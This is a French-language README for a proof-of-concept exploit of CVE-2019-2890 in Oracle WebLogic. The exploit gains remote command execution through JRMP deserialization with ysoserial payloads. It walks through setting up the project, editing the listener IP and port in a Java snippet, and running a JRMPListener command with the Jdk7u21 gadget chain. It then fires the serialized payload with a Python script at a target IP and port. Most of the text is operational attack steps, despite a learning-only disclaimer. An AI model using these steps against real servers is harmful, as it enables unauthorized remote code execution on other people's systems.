
Exploit PoC pour CVE-2019-2890 ciblant Oracle WebLogic, utilisant la désérialisation JRMP pour atteindre une exécution de commande à distance via les payloads ysoserial.
Utilisation uniquement pour l'apprentissage et l'échange. Les autres utilisations sont à vos risques et périls.
Les fichiers jar pertinents ont déjà été importés dans le projet et la méthode d'exploitation utilise JRMP de yso. Lors de l'apprentissage et du débogage, la méthode d'exploitation peut être modifiée.
Tout d'abord, placez le fichier SerializedSystemIni.dat de Weblogic dans le dossier security.
Ensuite, renommez yso en ysoserial.jar et importez-le dans le répertoire lib.

Ensuite, dans weblogic/wsee/jaxws/persistence/PersistentContext.java, modifiez l'adresse IP et le port de la méthode getObject.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Enfin, écoutez à distance via JRMP et exécutez la commande à l'aide de 7u21.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Utilisation : exécutez Poc.java pour générer le fichier de sérialisation poc.ser, puis utilisez
python weblogic.py ip port poc.ser

